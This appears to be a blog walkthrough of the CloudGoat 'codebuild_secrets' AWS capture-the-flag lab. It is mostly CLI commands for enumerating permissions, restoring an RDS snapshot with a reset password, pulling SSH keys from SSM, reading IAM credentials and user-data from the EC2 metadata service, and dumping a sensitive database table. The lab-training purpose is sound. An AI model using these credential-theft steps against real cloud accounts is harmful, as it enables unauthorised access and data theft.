Cloudgoat AWS CTF solution- Scenerio 9 (codebuild_secrets)

Scenerio 9- codebuild_secrets

git clone https://github.com/RhinoSecurityLabs/cloudgoat.git
cd cloudgoat
chmod +x cloudgoat.py
./cloudgoat.py config whitelist --auto
./cloudgoat.py create codebuild_secrets

Scenario Resources

  • RDS x 1
  • EC2 x 1

Scenario Start(s)

Scenario Goal(s)

Summary

Exploitation Route(s)

Walkthrough — Calrissian via RDS Snapshot

  1. As the IAM User Solo, the attacker explores the AWS environment and enumerates its permissions, and discovers they are able to list CodeBuild projects.
aws codebuild list-projects --profile solo
aws codebuild batch-get-projects --names cg-codebuild-codebuild_secrets_cgidnmff3ngu3y --profile solo
aws rds create-db-snapshot --db-instance-identifier cg-rds-instance-codebuild-secrets-cgidnmff3ngu3y --db-snapshot-identifier cloudgoat --profile calrissian
aws rds describe-db-subnet-groups --profile calrissian
aws ec2 describe-security-groups --profile calrissian
aws rds restore-db-instance-from-db-snapshot --db-instance-identifier copy-of-old --db-snapshot-identifier cloudgoat --db-subnet-group-name cloud-goat-rds-testing-subnet-group-codebuild_secrets_cgidnmff3ngu3y --publicly-accessible --vpc-security-group-ids sg-03bb0912657c162f0 --profile calrissian
aws rds describe-db-instances --profile calrissian
aws rds modify-db-instance --db-instance-identifier copy-of-old --master-user-password cloudgoat --profile calrissian
nmap -Pn --disable-arp-ping -n -vv -sS -p5432 copy-of-old.czksqkjfewb6.us-east-1.rds.amazonaws.com
psql -h copy-of-old.czksqkjfewb6.us-east-1.rds.amazonaws.com -U cgadmin -d postgres
#list available databases
\l
#change to database
\c securedb
#list tables
\dt
select * from sensitive_information;

Walkthrough — Solo via EC2 Metadata service

  1. As solo user iam-enumerate tool was unable to determine ssm permissions but upon manually checking solo’s permissions we can see we have ssm:DescribeParameters and ssm:GetParameter permissions.
aws ssm describe-parameters --profile solo
  1. In the account’s SSM parameters, we found a pair of SSH keys stored without any encryption.
aws ssm get-parameter --name cg-ec2-private-key-codebuild_secrets_cgidnmff3ngu3y --profile solo
echo -e <ssh_key_without_newlines> > ssh_key_private.out
chmod 400 ssh_key_private.out
aws ec2 describe-instances --profile solo
ssh -i ssh_key_private.out ubuntu@52.71.210.122

Branch A

  1. Now working with shell access, we can query the EC2 metadata service and discover the instance-profile’s IAM keys, and log in using ec2’s role.
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/cg-ec2-role-codebuild_secrets_cgidnmff3ngu3y
aws lambda list-functions --profile ec2_role
aws rds describe-db-instances --profile ec2_role
psql -h cg-rds-instance-codebuild-secrets-cgidnmff3ngu3y.czksqkjfewb6.us-east-1.rds.amazonaws.com -U cgadmin -d securedb

Branch B

  1. Now working with shell access, the we query the EC2 metadata service and discover that the database address is stored there, along with admin credentials-
curl http://169.254.169.254/latest/user-data
psql postgresql://cgadmin:wagrrrrwwgahhhhwwwrrggawwwwwwrr@cg-rds-instance-codebuild-secrets-cgidnmff3ngu3y.czksqkjfewb6.us-east-1.rds.amazonaws.com:5432/securedb
psql -h cg-rds-instance-codebuild-secrets-cgidnmff3ngu3y.czksqkjfewb6.us-east-1.rds.amazonaws.com -U cgadmin -d securedb#listing tables
\dt
select * from sensitive_information;

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store